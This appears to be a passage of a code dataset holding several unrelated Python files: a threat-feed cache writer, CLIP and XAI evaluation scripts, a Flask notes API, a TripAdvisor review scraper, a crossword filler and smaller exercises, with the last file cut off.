feed['reports'] = reports\n feed['feedinfo']['num_reports'] = len(reports)\n return feed\n\n def write_reports(self, reports):\n self._ensure_location_exists()\n feed = self.generate_feed(reports)\n success = self.write_feed(feed)\n del feed\n gc.collect()\n return success\n\n def write_feed(self, feed):\n _logger.debug(\"Writing to feed cache.\")\n write_start = timer()\n try:\n self._ensure_location_exists()\n with open(os.path.join(self._location, self._feed_cache_new_file), \"w\") as f:\n if self._config.pretty_print_json:\n f.write(json.dumps(feed, indent=2))\n else:\n f.write(json.dumps(feed))\n del feed\n self._swap_file_cache()\n self._exists = True\n _logger.debug(\"Finished writing feed to cache ({0:.3f} seconds).\".format(timer() - write_start))\n\n except (IOError, OSError) as e:\n _logger.error(\"Failed to write to feed cache: {}\".format(e))\n return False\n return True\n\n def read(self, as_text=False):\n if not self.exists:\n return None\n with self._lock:\n try:\n with open(os.path.join(self._location, self._feed_cache_file), \"r\") as f:\n return f.read() if as_text else json.loads(f.read())\n except (IOError, OSError) as e:\n _logger.exception(\"Could not read from feed cache: {0}\".format(e))\n return None\n\n def create_stream(self):\n return FeedStream(self._config, self._location, self._lock)\n","repo_name":"carbonblack/cb-threatconnect-connector","sub_path":"src/cbopensource/connectors/threatconnect/feed_cache.py","file_name":"feed_cache.py","file_ext":"py","file_size_in_byte":9991,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"23478639415","text":"import os\nimport clip\nimport torch\nfrom torchvision.datasets import CIFAR100\n\nfrom PIL import Image\nimport requests\nfrom transformers import AutoProcessor, BlipModel\n\n# model = BlipModel.from_pretrained(\"Salesforce/blip-image-captioning-base\")\n# processor = AutoProcessor.from_pretrained(\"Salesforce/blip-image-captioning-base\")\n\n# import cv2\nimport os\nfrom tqdm import tqdm\nimport math\nimport numpy as np\nimport os\nimport clip\nimport torch\nimport re\nimport torch\n\n#model_b, preprocess = clip.load(params['model_size'], device='cpu')\n\nclass Dataset(torch.utils.data.Dataset):\n \n def __init__(self, images):\n self.images=images\n \n def __len__(self):\n return len(self.images)\n \n def __getitem__(self, index):\n X = self.images[index]\n return preprocess(X)\n\n\ndef compute_model_performance(model_dict: dict()):\n global preprocess\n device = 'cuda'\n cifar100 = CIFAR100(root=os.path.expanduser(\"~/.cache\"), download=True, train=False)\n params = {}\n params['model_size'] = \"ViT-B/32\"\n params['device'] = device if torch.cuda.is_available() else \"cpu\"\n model, preprocess = clip.load(params['model_size'], device=params['device'])\n model.load_state_dict(model_dict)\n model = model.to('cuda')\n model.eval()\n model.requires_grad_(False)\n print(\"CLIP model loaded\")\n params = {'batch_size': 32, 'shuffle': False, 'num_workers':4}\n testset=[]\n correctlabels=[]\n for image,class_id in cifar100:\n testset.append(image)\n correctlabels.append(class_id)\n text_inputs = torch.cat([clip.tokenize(f\"a photo of a {c}\") for c in cifar100.classes]).to(device)\n text_features = model.encode_text(text_inputs).float()\n test_set = Dataset(testset)\n results = []\n testloader = torch.utils.data.DataLoader(test_set, **params)\n for idx, item in enumerate(tqdm(testloader,desc=\"Inference\")):\n with torch.no_grad():\n item = item.to(device)\n outputs = model.encode_image(item).float()\n\n results.append(outputs)\n \n \n img_features = torch.vstack(results[0:-1]) \n img_features /= img_features.norm(dim=-1, keepdim=True)\n values,indices = (img_features.squeeze() @ text_features.T).softmax(dim=1).topk(1)\n accuracy = {}\n for idx,item in enumerate(indices):\n accuracy[idx] = 0\n if (item.item() == correctlabels[idx]):\n accuracy[idx] = 1\n top1= sum(accuracy.values())/len(accuracy)\n print(f\"Top-1 accuracy is {sum(accuracy.values())/len(accuracy)}\")\n values,indices = (img_features.squeeze() @ text_features.T).softmax(dim=1).topk(5)\n accuracy = {}\n for idx,item in enumerate(indices):\n accuracy[idx] = 0\n for curr_item in item:\n if (curr_item.item() == correctlabels[idx]):\n accuracy[idx] = 1\n top5 = sum(accuracy.values())/len(accuracy)\n print(f\"Top-5 accuracy is {sum(accuracy.values())/len(accuracy)}\")\n return {\"top-1\":top1, \"top-5\":top5}","repo_name":"sinkanishk/E6998-HPML-TermProject","sub_path":"utils/CLIP_CIFAR_100.py","file_name":"CLIP_CIFAR_100.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73165084392","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport tensorflow as tf\nfrom math import ceil\nfrom time import time\nimport keras\nimport xplique\nfrom xplique.attributions import Rise\nfrom xplique.plots import plot_attributions\nimport cv2\nimport requests\n\ndef download_image(image_url, filename):\n response = requests.get(image_url, stream=True)\n if response.status_code == 200:\n with open(filename, 'wb') as file:\n for chunk in response.iter_content(1024):\n file.write(chunk)\n\n# Example Usage\ndownload_image('https://unsplash.com/photos/X2PwqTUpXH8/download?force=true&w=640', 'fox1.jpg')\ndownload_image('https://unsplash.com/photos/tIfrzHxhPYQ/download?force=true&w=640', 'fox2.jpg')\ndownload_image('https://unsplash.com/photos/LVnJlyfa7Zk/download?force=true&w=640', 'sea_turtle.jpg')\ndownload_image('https://unsplash.com/photos/sSEEbAzB6fU/download?force=true&w=640', 'lynx.jpg')\ndownload_image('https://unsplash.com/photos/41dAczoRYJY/download?force=true&w=640', 'cat.jpg')\ndownload_image('https://unsplash.com/photos/axqTLZ12Jss/download?force=true&w=640', 'otter.jpg')\n\nimg_list = [\n ('fox1.jpg', 277),\n ('fox2.jpg', 277),\n ('sea_turtle.jpg', 33),\n ('lynx.jpg', 287),\n ('cat.jpg', 281),\n ('otter.jpg', 360)\n]\n\ndef central_crop_and_resize(img, size=224):\n \"\"\"\n Given a numpy array, extracts the largest possible square and resizes it to\n the requested size\n \"\"\"\n h, w, _ = img.shape\n\n min_side = min(h, w)\n max_side_center = max(h, w) // 2.0\n\n min_cut = int(max_side_center-min_side//2)\n max_cut = int(max_side_center+min_side//2)\n\n img = img[:, min_cut:max_cut] if w > h else img[min_cut:max_cut]\n img = tf.image.resize(img, (size, size))\n\n return img\n\nX = []\nY = []\n\nfor img_name, label in img_list:\n img = cv2.imread(img_name)[..., ::-1] # when cv2 load an image, the channels are inversed\n img = central_crop_and_resize(img)\n label = tf.keras.utils.to_categorical(label, 1000)\n\n X.append(img)\n Y.append(label)\n\nX = np.array(X, dtype=np.float32)\nY = np.array(Y)\n\nplt.rcParams[\"figure.figsize\"] = [15, 6]\nfor img_id, img in enumerate(X):\n plt.subplot(1, len(X), img_id+1)\n plt.imshow(img/255.0)\n plt.axis('off')\n\nimport tensorflow.keras.applications as app\n\nmodel, preprocessing = app.MobileNetV2(classifier_activation=\"linear\"), app.mobilenet_v2.preprocess_input\nX_preprocessed = preprocessing(np.array(X, copy=True))\n\nfrom xplique.attributions import (Saliency, GradientInput, IntegratedGradients, SmoothGrad, VarGrad,\n SquareGrad, GradCAM, Occlusion, Rise, GuidedBackprop,\n GradCAMPP, Lime, KernelShap, SobolAttributionMethod)\nfrom xplique.commons import forgrad\n\nbatch_size = 64\nexplainers = [\n Saliency(model),\n GradientInput(model),\n GuidedBackprop(model),\n IntegratedGradients(model, steps=80, batch_size=batch_size),\n SmoothGrad(model, nb_samples=80, batch_size=batch_size),\n SquareGrad(model, nb_samples=80, batch_size=batch_size),\n VarGrad(model, nb_samples=80, batch_size=batch_size),\n Occlusion(model, patch_size=10, patch_stride=5, batch_size=batch_size),\n]\n\nfor explainer in explainers:\n\n explanations = explainer(X_preprocessed, Y)\n\n print(f\"Method: {explainer.__class__.__name__}\")\n plot_attributions(explanations, X, img_size=2., cmap='jet', alpha=0.4,\n cols=len(X), absolute_value=True, clip_percentile=0.5)\n plt.show()\n\n filtered_explanations = forgrad(explanations, sigma=15)\n print('With ForGRAD')\n plot_attributions(filtered_explanations, X, img_size=2., cmap='jet', alpha=0.4,\n cols=len(X), absolute_value=True, clip_percentile=0.5)\n plt.show()\n\n print(\"\\n\")\n\nfrom xplique.plots import plot_attribution\n\ndef show(img, **kwargs):\n img = np.array(img)\n img -= img.min(); img / img.max()\n plt.imshow(img, **kwargs)\n\n\nexplainer = SmoothGrad(model)\nexplanations = explainer(X_preprocessed, Y)\n\nfiltered_explanations = []\n\nsigmas=[224, 200, 125, 100, 50, 30, 20, 15, 7, 4]\n\nfor sigma in sigmas:\n filtered_explanation = forgrad(explanations, sigma=sigma)\n filtered_explanations.append(filtered_explanation)\n\nfor x_i, x in enumerate(X):\n for sigma_i, sigma in enumerate(sigmas):\n\n plt.subplot(1, len(sigmas), sigma_i+1)\n plot_attribution(filtered_explanations[sigma_i][x_i], X[x_i], cmap='jet', alpha=0.4,\n absolute_value=True, clip_percentile=0.5)\n plt.title(f'sigma={sigma}')\n\n plt.show()\n\nprint(\"\\n\")","repo_name":"Medhasweta/Deep_Learning_Team_2","sub_path":"CODE/Medhasweta Sen/XAI/ForGrad.py","file_name":"ForGrad.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32433791808","text":"import sqlalchemy as sa\nimport sqlalchemy.orm as orm\n\nfrom dbk.core import models\nfrom dbk.errors import DbkError\n\n\nclass InitializationFailed(DbkError):\n pass\n\n\ndef initialize(session: orm.sessionmaker[orm.Session]):\n \"\"\"\n Ensures there is at least one book in the database. If there is not, a book is\n created with the name \"My Book\" and the currency \"USD\". Four root accounts are\n added to the book: \"Assets\", \"Liabilities\", \"Incomes\", and \"Expenses\".\n\n :raises InitializationFailed: if this method fails in any way\n \"\"\"\n try:\n with session() as s, s.begin():\n if has_any_books(s):\n return\n add_default_book(s)\n except Exception as e:\n raise InitializationFailed(\"Failed to initialize database\") from e\n\n\ndef has_any_books(session: orm.Session) -> bool:\n return session.execute(sa.select(sa.func.count(models.Book.id))).scalar_one() > 0\n\n\ndef add_default_book(session: orm.Session) -> models.Book:\n book = models.Book(name=\"My Book\", currency=\"USD\")\n session.add(book)\n\n root_accounts = [\n (\"Assets\", models.AccountType.asset),\n (\"Liabilities\", models.AccountType.liability),\n (\"Incomes\", models.AccountType.income),\n (\"Expenses\", models.AccountType.expense),\n ]\n\n for name, account_type in root_accounts:\n book.accounts.append(\n models.Account(\n name=name,\n account_type=account_type,\n is_root=True,\n is_virtual=True,\n )\n )\n\n return book\n","repo_name":"EvanAranda/dbk","sub_path":"dbk/core/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19323054701","text":"import erp_extraction.menu.phase_00_functions as p0\nimport erp_extraction.menu.phase_01_functions as p1\n\n\nclass Menu:\n menu_id = \"start\"\n last_user_input = None\n __phases = [\n {\n \"id\": \"start\",\n \"options\": {\n \"Attendance Summary\": p1.attendance_summary,\n \"Day to Day Attendance Table\": p1.day_day_attendance,\n \"Grades\": p1.grades,\n \"Exit\": p0.exitmenu,\n },\n }\n ]\n\n def __init__(self) -> None:\n pass\n\n def get_options(self):\n for phase in self.__phases:\n if phase[\"id\"] == self.get_current_menu_id():\n return phase[\"options\"]\n\n def add_phase(self, id, options):\n self.__phases.append({\"id\": id, \"options\": options})\n\n def display_menu(self):\n while True:\n print(\"\\n\")\n cur_id = self.get_current_menu_id()\n if cur_id == \"end\":\n break\n\n options = self.get_options()\n\n for (index, option) in enumerate(options.keys()):\n print(f\"{index + 1}. {option}\")\n\n print()\n user_input = int(input(\"Option: \")) - 1\n self.last_user_input = user_input\n print()\n for (index, cb) in enumerate(options.values()):\n # From python 3.6+ disctionaries are ordered\n if index == user_input:\n cb(self)\n\n def get_current_menu_id(self):\n return self.menu_id\n\n def set_current_menu_id(self, new_id):\n self.menu_id = new_id\n","repo_name":"tmayush/erp_extraction","sub_path":"erp_extraction/menu/menu_display.py","file_name":"menu_display.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16584661502","text":"from scipy.fftpack import fft\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom pylab import*\nfrom scipy.io import wavfile\nimport math\n\nclass Rhythmus():\n staticmethod\n\n bpm = 0\n s1 = []\n end = {}\n \n def graph(name):\n #name = 'All.wav'\n sampFreq, snd = wavfile.read(name)\n\n snd = snd / (2.**15)\n #print(\"snd.shape: \"+ str(snd.shape))\n\n points = snd.shape[0]\n #print(points)\n\n if len(snd.shape) == 1:\n s1 = snd[:]\n else:\n s1 = snd[:, 0]\n #print(snd.shape[0])\n return s1\n\n def bpm(s1):\n s3 = s1\n\n for i in range(len(s3)):\n if s3[i] < 0:\n s3[i] = 0\n\n sorted_s1 = sort(s3)\n\n for i in range(len(s1)):\n if s3[i] < sorted_s1[len(s1) - len(s1)/10 ]:\n s3[i] = 0\n else:\n s3[i] = 1\n\n #plt.plot(s3, color='k')\n #plt.show()\n\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n ###### ##### ##### ### ## #### ###\n\n white_size = 0\n white_erro = 0\n white_space = []\n\n black_space_inicio = []\n black_space_final = []\n\n n = 5000\n \n for i in range(len(s3)):\n if s3[i] == 1:\n if white_erro > n:\n black_space_inicio.append(i)\n #black_space_final.append(i-black_space_inicio[])\n if white_size > 0:\n white_space.append(white_size)\n white_size = 0\n white_erro = 0\n \n if s3[i] == 0:\n # if len(spaces) > 0:\n if white_erro == n:\n black_space_final.append(i-n)\n if white_erro > n:\n \n white_erro = white_erro + 1\n white_size = white_erro\n else:\n white_erro = white_erro + 1\n # else:\n # pass\n\n plt.plot(s3, color='k')\n plt.show()\n \n black_space = []\n\n for i in range(len(white_space)+1):\n if i == 0:\n black_space.append(black_space_final[0])\n else:\n black_space.append(black_space_final[i] - black_space_inicio[i-1])\n \n if white_size > 0:\n white_space.append(white_size)\n white_size = 0\n white_erro = 0\n\n janelas = []\n for i in range(len(white_space)):\n janelas.append(white_space[i] + black_space[i-1])\n\n minimo = 1000000000\n\n for i in range(len(white_space)):\n if (white_space[i] + black_space[i]) < minimo:\n minimo = white_space[i] + black_space[i]\n\n tempos = []\n for i in range(len(white_space)):\n tempos.append( round((white_space[i] + black_space[i])/minimo) )\n\n \n end = {}\n end['janelas'] = janelas\n end['tempo'] = minimo\n end['tempos'] = tempos\n end['s1'] = s1\n\n return end\n\n def go(name):\n s1 = Rhythmus.graph(name)\n end = Rhythmus.bpm(s1)\n return end\n","repo_name":"GBortoto/Unknown","sub_path":"Rhythmus - v0.1.py","file_name":"Rhythmus - v0.1.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33363767935","text":"a=input('borne basse')\nb=input('borne haute')\na=int(a)\nb=int(b)\n \naddition=0\ni=a\n\nwhile i<=b:\n if (not i%3) or (not i%5):\n addition=addition+i\n i+=1\nprint(addition)\n \n \n \n \n \n","repo_name":"yayaya123/Python","sub_path":"Ex608.py","file_name":"Ex608.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72354774633","text":"import cx_Oracle\nfrom databasecon import *\nfrom StockReader import *\n\n\ndef fetchByJoin():\n\n stCode=takeInputFromUser()\n record = getSectorAndStockInfo(stCode)\n\n sectorName = record[0]\n subSectorName = record[1]\n subSubSectorName=record[2]\n stockName = record[3]\n\n\n\n print(\"Stock Code:{},Stock Name:{},Subsector Name:{},Sector Name:{},Subsubsector Name:{}\".format(stCode, stockName, subSectorName,\n sectorName,subSubSectorName))\n return stockName,subSectorName,sectorName,stCode\n\ndef takeInputFromUser():\n r = input(\"Enter Stock Code:\").upper()\n return r\n\n","repo_name":"manasnayak/StockPortfolio","sub_path":"FetchByJoin.py","file_name":"FetchByJoin.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2988710270","text":"class Solution:\n \"\"\"\n 在每加入一个新的单词之前,都先判断下 words[i] 是不是 words[i-1] 的前缀\n \"\"\"\n def minimumLengthEncoding(self, words: list) -> int:\n s = set(words)\n for word in words:\n for i in range(1, len(word)):\n s.discard(word[i:])\n res = 0\n for em in s:\n res += len(em) + 1\n return res\n","repo_name":"Transi-ent/LeetcodeSolver","sub_path":"820.py","file_name":"820.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28751375575","text":"import json, os\nfrom dotenv import load_dotenv\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS\nfrom db.model import Paragraph\nfrom db import (\n get_paragraphs_by_noteids,\n delete_paragraphs_by_id,\n update_paragraphs,\n vector_similarity_search,\n vector_distance_search,\n search_paragraph_contents,\n get_paragraph_neighbors,\n get_paragraph_by_paraid,\n delete_note_paragraphs\n)\n\n\nfrom lm import (\n encode_text,\n summarize_documents\n)\n\nload_dotenv()\napp = Flask(__name__)\nCORS(app)\n\n@app.route(\"/\")\ndef hello_world():\n return \"<p>Hello, World!</p>\"\n\n# Used for writing new paragraphs, and update or deleting existing paragraphs\n@app.post('/edit_paragraphs')\ndef edit_paragraphs():\n body = request.json\n \n if 'delete' in body and body['delete']:\n #delete logic\n delete_paragraphs_by_id(body['delete'])\n \n if 'update' in body and body['update']:\n #update logic\n paragraphs_to_update = []\n for element in body['update'].values():\n paragraphs_to_update.append(\n Paragraph (\n id = element['id'],\n note_id = element['note_id'] if 'note_id' in element else '-1',\n next = element['next'] if 'next' in element else None,\n previous = element['previous'] if 'previous' in element else None,\n embedding = encode_text(element['contents']),\n contents = element['contents']\n )\n )\n \n if paragraphs_to_update:\n update_paragraphs(paragraphs_to_update)\n \n return ''\n\n@app.get(\"/get_paragraphs/<note_id>\")\ndef get_paragraphs(note_id):\n paragraphs = get_paragraphs_by_noteids([note_id])\n return jsonify(paragraphs)\n\n@app.delete(\"/<note_id>\")\ndef delete_note(note_id):\n delete_note_paragraphs(note_id=note_id)\n return f'Deleted paragraphs for note {note_id}!'\n\n@app.post('/get_paragraphs')\ndef get_paragraphs_with_list():\n body = request.json\n \n if 'note_ids' not in body:\n return 'No note_ids parameter specified', 400\n \n rs = get_paragraphs_by_noteids(body['note_ids'])\n \n return jsonify(rs)\n\n@app.post('/get_knn_links')\ndef get_knn_links():\n body = request.json\n \n if 'para_id' not in body:\n return 'no para_id specified', 400\n \n if 'note_ids' not in body:\n return 'No note_ids parameter specified', 400\n \n \n k = 3 if 'k' not in body else body['k']\n paragraph = get_paragraph_by_paraid(body['para_id'])\n rs = get_paragraph_neighbors(paragraph, body['note_ids'], k)\n\n result = {\n \"links\" : rs if rs else []\n }\n \n if 'include_summary' in body and body['include_summary']:\n contents = paragraph['contents']\n if len(contents) > 250:\n summary = summarize_documents(contents)\n else:\n summary = contents\n result['summary'] = summary\n \n \n return jsonify(result)\n\n\n\n\n\n# Used for writing new paragraphs, and update or deleting existing paragraphs\n@app.post('/get_similarity_links')\ndef get_similarity_links():\n body = request.json\n \n if 'para_id' not in body:\n return \"theres no para_id\", 400\n \n paragraph = get_paragraph_by_paraid(body['para_id'])\n threshold = 0.5 if 'threshold' not in body else float(body['threshold'])\n rs = vector_similarity_search(paragraph['embedding'],threshold, [paragraph[\"note_id\"]])\n \n combined_contents = \"\\n\".join([result['contents'] for result in rs])\n \n result = {\n \"paragraphs\": rs\n }\n \n if 'include_summary' in body and body['include_summary']:\n print(\"test summarization 1\")\n if len(combined_contents) > 250:\n print(\"test summarization 2\")\n summary = summarize_documents(combined_contents)\n else:\n summary = None\n result['summary'] = summary\n return jsonify(result)\n \n@app.post('/keyword_search')\ndef keyword_search():\n body = request.json\n if 'query' not in body:\n return \"theres no query\", 400\n \n rs = search_paragraph_contents(body['query'])\n \n return jsonify(rs)\n","repo_name":"mnnaegel/NoteNexus","sub_path":"notenexus-lm-api/src/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"69798253033","text":"import scrapy\nfrom scrapy.crawler import CrawlerProcess\n\n# Trip Advisor Spider class\nclass TASpider(scrapy.Spider):\n\n # variable name\n name = \"taspider\"\n\n # start_requests method: to define which websites to scrape\n def start_requests(self):\n\n # list of webpages to scrape\n # Note: Just added three more pages which are different reviews page numbers of the same restaurant\n # so that we don't miss anything\n \n urls = [ \"https://www.tripadvisor.in/Restaurant_Review-g304551-d13388460-Reviews-Kitchen_With_A_Cause-New_Delhi_National_Capital_Territory_of_Delhi.html\",\n \"https://www.tripadvisor.in/Restaurant_Review-g304551-d13388460-Reviews-or130-Kitchen_With_A_Cause-New_Delhi_National_Capital_Territory_of_Delhi.html\",\n \"https://www.tripadvisor.in/Restaurant_Review-g304551-d13388460-Reviews-or80-Kitchen_With_A_Cause-New_Delhi_National_Capital_Territory_of_Delhi.html\",\n \"https://www.tripadvisor.in/Restaurant_Review-g304551-d13388460-Reviews-or180-Kitchen_With_A_Cause-New_Delhi_National_Capital_Territory_of_Delhi.html\" ]\n # follow the links to the next parser\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse_front)\n\n # parse_front method: to parse the front page\n def parse_front(self, response):\n\n # narrow down on the page block elements\n page_blocks = response.css('div.pageNumbers')\n # direct to the page links\n page_links = page_blocks.xpath('./a/@href')\n # extract the links\n links_to_follow = page_links.extract()\n print(\"\\nNumber of pages\\n\")\n print(len(links_to_follow))\n # follow the links to the next parser\n for link in links_to_follow:\n yield response.follow(url=link, callback=self.parse_second)\n \n def parse_second(self, response):\n #narrow down to eaach review\n review_blocks=response.css('div.quote')\n review_links=review_blocks.xpath('./a/@href')\n review_links=review_links.extract()\n\n for link in review_links:\n yield response.follow(url=link, callback=self.parse_pages)\n\n # parse_pages method: to parse the pages\n def parse_pages(self, response):\n\n # direct to the review title text\n review_title = response.css( 'span.noQuotes::text')\n # extract and clean the review title text\n review_title = review_title.extract_first()\n #review date\n review_date=response.css('span.ratingDate::text').extract_first()\n # direct to review text\n review_text = response.css('p.partial_entry::text')\n # extract and clean review text\n review_text = review_text.extract_first()\n # store this in dictonary\n reviews_list.append([response.url, review_title, review_date, review_text])\n\n\n# Initialize the list\nreviews_list=[]\nimport csv\n\n#\n# Run the Spider\nprocess = CrawlerProcess()\nprocess.crawl(TASpider)\nprocess.start()\n\n# reviews_list=list(set(reviews_list))\nprint(len(reviews_list))\nprint(reviews_list[-4:])\n\nwith open('reviewsData.csv', 'w') as f:\n #configure writer to write standard csv file\n writer = csv.writer(f, delimiter=',')\n writer.writerow(['Site', 'Review_title', 'Review_date', 'Review_paragraph'])\n for item in reviews_list:\n #Write item to f\n writer.writerow([item[0], item[1], item[2], item[3]]) ","repo_name":"dipansh-girdhar/Webscraping-and-text-analysis","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72128930154","text":"class Solution(object):\n def minMoves(self, target, maxDoubles):\n \"\"\"\n :type target: int\n :type maxDoubles: int\n :rtype: int\n \"\"\"\n c=0\n while target>1:\n while maxDoubles>0 and target%2==0:\n target//=2;c+=1;maxDoubles-=1\n if target!=1:\n if maxDoubles>0:target-=1;c+=1\n else:c+=target-1;break\n return c","repo_name":"bambamshivam/LeetCode","sub_path":"Weekly_Contest_276/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"22299873260","text":"import copy\n_list=list(open(\"wordlist2.txt\").read().splitlines())\n_list.sort(key=len, reverse=True)\n\nheight=5\nwidth=5\nmaxoverlap=1\nsymmetry=True\ngrid=[['0']*width for i in range(height)]\n\ndef cprint(grid):\n print('\\n'.join([''.join(['{:3}'.format(item) for item in row]) \n for row in grid]))\n\ndef findvalids(word,grid):\n valids=[]\n for i in range(0,len(grid[0])-len(word)+1):\n for j in range(0,len(grid)):\n testvalid = True\n for k in range(0,len(word)):\n if grid[j][i+k] != '0' and grid[j][i+k] != word[k]:\n testvalid = False\n break\n for k in range(maxoverlap,len(word)-maxoverlap-1):\n if j > 0:\n if grid[j-1][i+k] != '0' and grid[j-1][i+k+1] != '0':\n testvalid = False\n break\n if symmetry:\n if grid[-j][-i-k-1] != '0' and grid[-j][-i-k-2] != '0':\n testvalid = False\n break\n\n if j<len(grid)-1:\n if grid[j+1][i+k] != '0' and grid[j+1][i+k+1] != '0':\n testvalid = False\n break\n if symmetry:\n if grid[-j-2][-i-k-1] != '0' and grid[-j-2][-i-k-2] != '0':\n testvalid = False\n break\n if i>0:\n if grid[j][i-1] not in ['0',' ']:\n testvalid = False\n if symmetry:\n if grid[-j-1][-i] not in ['0',' ']:\n testvalid = False\n if i+len(word)<len(grid[0]):\n if grid[j][i+len(word)] not in ['0',' ']:\n testvalid = False\n if symmetry:\n if grid[-j-1][-i-len(word)-1] not in ['0',' ']:\n testvalid = False\n \n if symmetry and j*2+1==len(grid) and 2*len(word)>=len(grid[0]) and len(word) != len(grid[0]):\n testvalid = False\n \n if testvalid == True:\n valids.append([i,j,'Across'])\n\n for i in range(0,len(grid[0])):\n for j in range(0,len(grid)-len(word)+1):\n testvalid = True\n for k in range(0,len(word)):\n if grid[j+k][i] != '0' and grid[j+k][i] != word[k]:\n testvalid = False\n break\n for k in range(maxoverlap,len(word)-maxoverlap-1):\n if i > 0:\n if grid[j+k][i-1] != '0' and grid[j+k+1][i-1] != '0': \n testvalid = False\n break\n if symmetry:\n if grid[-j-k-1][-i] != '0' and grid[-j-k-2][-i] != '0': \n testvalid = False\n break\n\n if i<len(grid[0])-1:\n if grid[j+k][i+1] != '0' and grid[j+k+1][i+1] != '0':\n testvalid=False\n break\n if symmetry:\n if grid[-j-k-1][-i-2] != '0' and grid[-j-k-2][-i-2] != '0':\n testvalid=False\n break\n\n if j>0: \n if grid[j-1][i] not in ['0',' ']:\n testvalid = False\n if symmetry:\n if grid[-j][-i-1] not in ['0',' ']:\n testvalid = False\n\n if j+len(word)<len(grid): \n if grid[j+len(word)][i] not in ['0',' ']:\n testvalid = False\n if symmetry:\n if grid[-j-len(word)-1][-i-1] not in ['0',' ']:\n testvalid = False\n\n if symmetry and i*2+1==len(grid[0]) and 2*len(word)>=len(grid) and len(word)!=len(grid):\n testvalid = False\n\n if testvalid == True:\n valids.append([i,j,'Down'])\n return valids\n\ndef putin(word,grid,i,j,angle):\n if angle == 'Across':\n for k in range(0,len(word)):\n grid[j][i+k]=word[k]\n if i > 0:\n grid[j][i-1]=' '\n if symmetry == True:\n grid[-j-1][-i]=' '\n if i+len(word)<len(grid[0]):\n grid[j][i+len(word)]=' '\n if symmetry == True:\n grid[-j-1][-i-len(word)-1]=' '\n if angle == 'Down':\n for k in range(0,len(word)):\n grid[j+k][i]=word[k]\n if j > 0:\n grid[j-1][i]=' '\n if symmetry == True:\n grid[-j][-i-1]=' '\n if j+len(word)<len(grid):\n grid[j+len(word)][i]=' '\n if symmetry == True:\n grid[-j-len(word)-1][-i-1]=' '\n\n\n\ndef fill(grid,words,score):\n global bestscore\n #print(words) \n if len(words)!=0:\n valids=findvalids(words[0],grid)\n for valid in valids:\n ngrid=copy.deepcopy(grid)\n nscore=score\n putin(words[0],ngrid,*valid)\n nscore+=1\n #cprint(ngrid)\n if nscore>=bestscore:\n bestscore=nscore\n cprint(ngrid)\n print(bestscore)\n nwords=list(words)\n nwords.pop(0)\n fill(ngrid,nwords,nscore)\n words.pop(0)\n fill(grid,words,score)\n else:\n return\n \n\nif __name__==\"__main__\":\n score=0\n bestscore=0\n fill(grid,_list,score)","repo_name":"JamesEdgeley/CrosswordFitterPython","sub_path":"fitter.py","file_name":"fitter.py","file_ext":"py","file_size_in_byte":5512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21387753439","text":"# Nhập vào số nguyên N, tính tổng và tích của\n# các số nguyên từ 1 đến N.\n# #include <stdio.h>\n# void main()\n# {\n# int i, N, S, P;\n# printf(“Nhap N = “); scanf(“%d”, &N);\n# S = 0; P = 1;\n# for(i = 1; i <= N; i++)\n# {\n# S += i;\n# P *= i;\n# }\n# printf(“S = %d\\n”, S);\n# printf(“P = %d\\n”, P);\n# }\n\ndef main():\n N = int(input(\"Nhap N = \"))\n S = 0 ; P = 1\n for i in range(1, N+1): # from 1 to N\n S += i\n P *= i\n print(f'S = {S}')\n print(f'P = {P}')\n\nmain()","repo_name":"tiendat01/source-subject-hust","sub_path":"Python-learn-IT3150-ProjectI/ly-thuyet-TinDC-byPython/chuong4/page29.py","file_name":"page29.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27487425367","text":"#!/usr/bin/env python3\n# _*_ coding: utf-8 _*_\n\n\"\"\"\n 从 HDFS 中读取文件内容\n @see:https://pypi.org/project/PyHDFS/\n\"\"\"\n\n__author__ = 'JKong'\n\nimport pandas as pd\nfrom pyhdfs import HdfsClient\n\nclient = HdfsClient(hosts='10.10.27.47:9870', 